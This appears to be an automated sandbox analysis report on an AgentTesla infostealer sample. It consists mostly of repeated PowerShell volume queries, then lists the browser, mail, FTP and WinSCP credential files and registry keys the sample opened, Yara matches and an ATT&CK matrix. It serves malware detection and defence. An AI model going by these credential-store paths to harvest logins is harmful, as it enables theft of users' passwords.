Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Queries volume information: \Device\CdRom1\Objedn vka_20248481119000903.exe VolumeInformation	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: \Device\CdRom1\Objedn vka_20248481119000903.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000009.00000002.2939013791.0000000034E4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2939013791.0000000034E01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Objedn vka_20248481119000903.exe PID: 7856, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: \Device\CdRom1\Objedn vka_20248481119000903.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: \Device\CdRom1\Objedn vka_20248481119000903.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 00000009.00000002.2939013791.0000000034E01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Objedn vka_20248481119000903.exe PID: 7856, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000009.00000002.2939013791.0000000034E4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2939013791.0000000034E01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Objedn vka_20248481119000903.exe PID: 7856, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	11 Process Injection	1 Masquerading	2 OS Credential Dumping	311 Security Software Discovery	Remote Services	1 Email Collection	1 Non-Standard Port	1 Exfiltration Over Alternative Protocol	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	1 Credentials in Registry	1 Process Discovery	Remote Desktop Protocol	2 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	141 Virtualization/Sandbox Evasion	Security Account Manager	141 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	22 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	224 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Objedn#U00e1vka_20248481119000903.img	3%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nsj41C4.tmp\System.dll	0%	ReversingLabs
